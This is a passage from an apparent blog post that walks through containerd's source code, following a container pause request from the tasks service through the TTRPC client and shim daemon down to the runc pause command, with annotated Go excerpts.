<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">PauseTaskRequest</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">ptypes</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">s</span><span class="o">.</span><span class="n">local</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="c">// [2]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">registry</span><span class="o">.</span><span class="n">Register</span><span class="p">(</span><span class="o">&amp;</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">InitFn</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">ic</span> <span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">InitContext</span><span class="p">)</span> <span class="p">(</span><span class="n">any</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">i</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ic</span><span class="o">.</span><span class="n">GetByID</span><span class="p">(</span><span class="n">plugins</span><span class="o">.</span><span class="n">ServicePlugin</span><span class="p">,</span> <span class="n">services</span><span class="o">.</span><span class="n">TasksService</span><span class="p">)</span> <span class="c">// [4]</span>
            <span class="c">// [...]</span>
            <span class="k">return</span> <span class="o">&amp;</span><span class="n">service</span><span class="p">{</span><span class="n">local</span><span class="o">:</span> <span class="n">i</span><span class="o">.</span><span class="p">(</span><span class="n">api</span><span class="o">.</span><span class="n">TasksClient</span><span class="p">)},</span> <span class="no">nil</span> <span class="c">// [3]</span>
        <span class="p">},</span>
    <span class="p">})</span>
<span class="p">}</span>

<span class="c">// plugins/services/tasks/local.go</span>
<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">registry</span><span class="o">.</span><span class="n">Register</span><span class="p">(</span><span class="o">&amp;</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">ID</span><span class="o">:</span>       <span class="n">services</span><span class="o">.</span><span class="n">TasksService</span><span class="p">,</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">local</code> package defines <code class="language-plaintext highlighter-rouge">Pause()</code>. It first gets the container runtime task object via <code class="language-plaintext highlighter-rouge">l.getTask()</code> [6] and then calls <code class="language-plaintext highlighter-rouge">t.Pause()</code> [7]. The process for obtaining task object is somewhat complicated, so I’ve left some comments to help understand the call flow.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">PauseTaskRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">ptypes</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">getTask</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">ContainerID</span><span class="p">)</span> <span class="c">// [6], return runtime.Task</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">t</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [6]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">getTask</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="n">runtime</span><span class="o">.</span><span class="n">Task</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">getContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">id</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">l</span><span class="o">.</span><span class="n">getTaskFromContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">container</span><span class="p">)</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">getContainer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">var</span> <span class="n">container</span> <span class="n">containers</span><span class="o">.</span><span class="n">Container</span>
    <span class="c">// 'initFunc()' set 'l.containers' to 'metadata.NewContainerStore(db)'</span>
    <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">containers</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">id</span><span class="p">)</span> <span class="c">// call 'Get()' in 'core/metadata/containers.go'</span>
                                                <span class="c">// -&gt; get container from db</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">container</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">getTaskFromContainer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">container</span> <span class="o">*</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">)</span> <span class="p">(</span><span class="n">runtime</span><span class="o">.</span><span class="n">Task</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">/**
     * initFunc() set 'l.v2Runtime' to 'v2r.(runtime.PlatformRuntime)'
     * -&gt; v2r is from 'ic.GetByID(plugins.RuntimePluginV2, "task")'
     * -&gt; init() 'core/runtime/v2/task_manager.go' register 'plugins.RuntimePluginV2'
     * -&gt; Get() return 'newShimTask(shim)', which is defined in 'core/runtime/v2/shim.go'
     * -&gt; shimTask is the actual structure which is extended from runtime.Task interface
     */</span>
    <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">v2Runtime</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">container</span><span class="o">.</span><span class="n">ID</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">t</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">task</code> object of the <code class="language-plaintext highlighter-rouge">t.Pause()</code> call is returned from <code class="language-plaintext highlighter-rouge">newShimTask(shim)</code> in the <code class="language-plaintext highlighter-rouge">v2</code> package, so we can see that <code class="language-plaintext highlighter-rouge">t.Pause()</code> corresponds to the <code class="language-plaintext highlighter-rouge">Pause()</code> handler in the same package [8]. It then calls <code class="language-plaintext highlighter-rouge">s.task.Pause()</code>, whose definition lives in its task client, and <code class="language-plaintext highlighter-rouge">s.task</code> is created by <code class="language-plaintext highlighter-rouge">NewTaskClient()</code> [10].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/runtime/v2/shim.go</span>
<span class="k">package</span> <span class="n">v2</span>

<span class="k">func</span> <span class="n">newShimTask</span><span class="p">(</span><span class="n">shim</span> <span class="n">ShimInstance</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">shimTask</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">version</span> <span class="o">:=</span> <span class="n">shim</span><span class="o">.</span><span class="n">Endpoint</span><span class="p">()</span>
    <span class="n">taskClient</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">NewTaskClient</span><span class="p">(</span><span class="n">shim</span><span class="o">.</span><span class="n">Client</span><span class="p">(),</span> <span class="n">version</span><span class="p">)</span> <span class="c">// [10]</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">shimTask</span><span class="p">{</span>
        <span class="n">ShimInstance</span><span class="o">:</span> <span class="n">shim</span><span class="p">,</span>
        <span class="n">task</span><span class="o">:</span>         <span class="n">taskClient</span><span class="p">,</span> <span class="c">// [9]</span>
    <span class="p">},</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">shimTask</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span> <span class="c">// [8]</span>
    <span class="c">/**
     * s.task is assigned to NewTaskClient()'s return value, which calls a switch case with client type and version
     * - ttrpc + v2 -&gt; *ttrpcV2Bridge
     * - ttrpc + v3 -&gt; api.NewTTRPCTaskClient
     * - grpc + v3  -&gt; *grpcV3Bridge
     */</span>
    <span class="k">if</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">task</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">task</span><span class="o">.</span><span class="n">PauseRequest</span><span class="p">{</span>
        <span class="n">ID</span><span class="o">:</span> <span class="n">s</span><span class="o">.</span><span class="n">ID</span><span class="p">(),</span>
    <span class="p">})</span> <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">NewTaskClient()</code> returns different <code class="language-plaintext highlighter-rouge">TTRPCTaskService</code> object depending on the <strong>type</strong> and <strong>version</strong>. For a TTRPC client with version 2, a <code class="language-plaintext highlighter-rouge">ttrpctaskClient</code> object is created [11]. Finally, we wrap the TTRPC message and send it [12] to the service <code class="language-plaintext highlighter-rouge">"containerd.task.v2.Task"</code> with method <code class="language-plaintext highlighter-rouge">"Pause"</code> through the shim daemon socket.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/runtime/v2/bridge.go</span>
<span class="k">func</span> <span class="n">NewTaskClient</span><span class="p">(</span><span class="n">client</span> <span class="n">any</span><span class="p">,</span> <span class="n">version</span> <span class="kt">int</span><span class="p">)</span> <span class="p">(</span><span class="n">TaskServiceClient</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="n">c</span> <span class="o">:=</span> <span class="n">client</span><span class="o">.</span><span class="p">(</span><span class="k">type</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">case</span> <span class="o">*</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Client</span><span class="o">:</span>
        <span class="k">switch</span> <span class="n">version</span> <span class="p">{</span>
        <span class="k">case</span> <span class="m">2</span><span class="o">:</span>
            <span class="k">return</span> <span class="o">&amp;</span><span class="n">ttrpcV2Bridge</span><span class="p">{</span><span class="n">client</span><span class="o">:</span> <span class="n">v2</span><span class="o">.</span><span class="n">NewTTRPCTaskClient</span><span class="p">(</span><span class="n">c</span><span class="p">)},</span> <span class="no">nil</span> <span class="c">// &lt;--------</span>
        <span class="k">case</span> <span class="m">3</span><span class="o">:</span>
            <span class="k">return</span> <span class="n">api</span><span class="o">.</span><span class="n">NewTTRPCTaskClient</span><span class="p">(</span><span class="n">c</span><span class="p">),</span> <span class="no">nil</span>
        <span class="c">// [...]</span>
        <span class="p">}</span>

    <span class="k">case</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ClientConnInterface</span><span class="o">:</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">version</span> <span class="o">!=</span> <span class="m">3</span> <span class="p">{</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="o">&amp;</span><span class="n">grpcV3Bridge</span><span class="p">{</span><span class="n">api</span><span class="o">.</span><span class="n">NewTaskClient</span><span class="p">(</span><span class="n">c</span><span class="p">)},</span> <span class="no">nil</span>
    <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// api/runtime/task/v2/shim_ttrpc.pb.go</span>
<span class="k">func</span> <span class="n">NewTTRPCTaskClient</span><span class="p">(</span><span class="n">client</span> <span class="o">*</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Client</span><span class="p">)</span> <span class="n">TTRPCTaskService</span> <span class="p">{</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">ttrpctaskClient</span><span class="p">{</span> <span class="c">// [11]</span>
        <span class="n">client</span><span class="o">:</span> <span class="n">client</span><span class="p">,</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">ttrpctaskClient</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">PauseRequest</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">emptypb</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">var</span> <span class="n">resp</span> <span class="n">emptypb</span><span class="o">.</span><span class="n">Empty</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">Call</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="s">"containerd.task.v2.Task"</span><span class="p">,</span> <span class="s">"Pause"</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">resp</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [12]</span>
        <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">resp</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="4-containerd-shim-runc-v2-shim-daemon">4. containerd-shim-runc-v2 (shim Daemon)</h2>

<p>Every container <strong>needs a <code class="language-plaintext highlighter-rouge">shim</code> daemon</strong> to hold its stdio, wait for its init process, and report exit status back to <code class="language-plaintext highlighter-rouge">containerd</code>. This also decouples the container’s lifecycle from <code class="language-plaintext highlighter-rouge">containerd</code> itself: if <code class="language-plaintext highlighter-rouge">containerd</code> crashes or gets restarted, the <code class="language-plaintext highlighter-rouge">shim</code> keeps running, the container stays alive, and <code class="language-plaintext highlighter-rouge">containerd</code> can later re-attach to the <code class="language-plaintext highlighter-rouge">shim</code> daemon to recover state. As a result, a shim daemon exposes the Unix socket, allowing <code class="language-plaintext highlighter-rouge">containerd</code> to indirectly control the container.</p>

<p>When a <code class="language-plaintext highlighter-rouge">shim</code> daemon initializes, the main function <code class="language-plaintext highlighter-rouge">run()</code> iterates through all predefined service objects [1] and register each as a TTRPC service [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/shim/shim.go</span>
<span class="k">func</span> <span class="n">run</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">manager</span> <span class="n">Manager</span><span class="p">,</span> <span class="n">config</span> <span class="n">Config</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">p</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">registry</span><span class="o">.</span><span class="n">Graph</span><span class="p">(</span><span class="k">func</span><span class="p">(</span><span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">)</span> <span class="kt">bool</span> <span class="p">{</span> <span class="k">return</span> <span class="no">false</span> <span class="p">})</span> <span class="p">{</span>
        <span class="n">ttrpcServices</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">ttrpcServices</span><span class="p">,</span> <span class="n">src</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">srv</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">ttrpcServices</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">srv</span><span class="o">.</span><span class="n">RegisterTTRPC</span><span class="p">(</span><span class="n">server</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [2]</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">task</code> package’s register function calls <code class="language-plaintext highlighter-rouge">RegisterService()</code> with endpoint descriptors, one of which is <code class="language-plaintext highlighter-rouge">"Pause"</code> [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd-shim-runc-v2/task/service.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">RegisterTTRPC</span><span class="p">(</span><span class="n">server</span> <span class="o">*</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Server</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">taskAPI</span><span class="o">.</span><span class="n">RegisterTTRPCTaskService</span><span class="p">(</span><span class="n">server</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">RegisterTTRPCTaskService</span><span class="p">(</span><span class="n">srv</span> <span class="o">*</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Server</span><span class="p">,</span> <span class="n">svc</span> <span class="n">TTRPCTaskService</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">srv</span><span class="o">.</span><span class="n">RegisterService</span><span class="p">(</span><span class="s">"containerd.task.v2.Task"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">ServiceDesc</span><span class="p">{</span>
        <span class="n">Methods</span><span class="o">:</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Method</span><span class="p">{</span>
            <span class="o">...</span>
            <span class="s">"Pause"</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">unmarshal</span> <span class="k">func</span><span class="p">(</span><span class="k">interface</span><span class="p">{})</span> <span class="kt">error</span><span class="p">)</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span> <span class="c">// [3]</span>
                <span class="k">var</span> <span class="n">req</span> <span class="n">PauseRequest</span>
                <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">unmarshal</span><span class="p">(</span><span class="o">&amp;</span><span class="n">req</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span> <span class="p">}</span>
                <span class="k">return</span> <span class="n">svc</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">req</span><span class="p">)</span>
            <span class="p">},</span>
            <span class="o">...</span>
        <span class="p">},</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">svc.Pause()</code> ends up at the <code class="language-plaintext highlighter-rouge">Pause()</code> function in <code class="language-plaintext highlighter-rouge">containerd/go-runc/runc.go</code>, which actually runs the command <code class="language-plaintext highlighter-rouge">runc pause &lt;id&gt;</code> [4] to pause the container. Interesting!</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd-shim-runc-v2/task/service.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">taskAPI</span><span class="o">.</span><span class="n">PauseRequest</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">ptypes</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">getContainer</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">ID</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="n">s</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="o">&amp;</span><span class="n">eventstypes</span><span class="o">.</span><span class="n">TaskPaused</span><span class="p">{</span>
        <span class="n">ContainerID</span><span class="o">:</span> <span class="n">container</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// cmd/containerd-shim-runc-v2/runc/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">c</span><span class="o">.</span><span class="n">process</span><span class="o">.</span><span class="p">(</span><span class="o">*</span><span class="n">process</span><span class="o">.</span><span class="n">Init</span><span class="p">)</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// cmd/containerd-shim-runc-v2/process/init.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">Init</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">p</span><span class="o">.</span><span class="n">initState</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// cmd/containerd-shim-runc-v2/process/init_state.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">runningState</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">p</span><span class="o">.</span><span class="n">runtime</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">s</span><span class="o">.</span><span class="n">p</span><span class="o">.</span><span class="n">id</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/go-runc/runc.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">Runc</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">context</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">r</span><span class="o">.</span><span class="n">runOrError</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">command</span><span class="p">(</span><span class="n">context</span><span class="p">,</span> <span class="s">"pause"</span><span class="p">,</span> <span class="n">id</span><span class="p">))</span> <span class="c">// [4]</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="5-runc">5. runc</h2>

<p>From the previous section, we learned that the shim daemon handles the pause container request by <strong>forking a new process and executing <code class="language-plaintext highlighter-rouge">runc</code></strong>. But what exactly is <code class="language-plaintext highlighter-rouge">runc</code>?</p>

<p><a href="https://github.com/opencontainers/runc">runc</a> is a <strong>low-level container runtime</strong> implementation, or you can say an OCI (Open Container Initiative) runtime. Its job is to directly control a container, such as creating a new container, listing all processes inside a container, and so on.</p>

<p>We’ll continue using “pause a container” as our example. The variable <code class="language-plaintext highlighter-rouge">pauseCommand</code> in <code class="language-plaintext highlighter-rouge">pause.go</code> defines how the pause command works, and other commands follow a similar pattern: a file named <code class="language-plaintext highlighter-rouge">&lt;command_name&gt;.go</code> with a corresponding variable <code class="language-plaintext highlighter-rouge">&lt;command_name&gt;Command</code>.</p>

<p>The <code class="language-plaintext highlighter-rouge">Action</code> field shows the implementation: check arguments, get the container, and pause it [1].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pause.go</span>
<span class="k">var</span> <span class="n">pauseCommand</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">{</span>
    <span class="n">Name</span><span class="o">:</span>  <span class="s">"pause"</span><span class="p">,</span>
    <span class="n">Usage</span><span class="o">:</span> <span class="s">"pause suspends all processes inside the container"</span><span class="p">,</span>
    <span class="n">ArgsUsage</span><span class="o">:</span> <span class="s">`&lt;container-id&gt;

Where "&lt;container-id&gt;" is the name for the instance of the container to be
paused. `</span><span class="p">,</span>
    <span class="n">Description</span><span class="o">:</span> <span class="s">`The pause command suspends all processes in the instance of the container.

Use runc list to identify instances of containers and their current status.`</span><span class="p">,</span>
    <span class="c">// Disable comma as separator for slice flags.</span>
    <span class="n">DisableSliceFlagSeparator</span><span class="o">:</span> <span class="no">true</span><span class="p">,</span>
    <span class="n">Action</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">_</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cmd</span> <span class="o">*</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">checkArgs</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="m">1</span><span class="p">,</span> <span class="n">exactArgs</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
            <span class="k">return</span> <span class="n">err</span>
        <span class="p">}</span>
        <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">getContainer</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">container</span><span class="o">.</span><span class="n">Pause</span><span class="p">()</span> <span class="c">// [1]</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="no">nil</span>
    <span class="p">},</span>
<span class="p">}</span>
</code></pre></div></div>

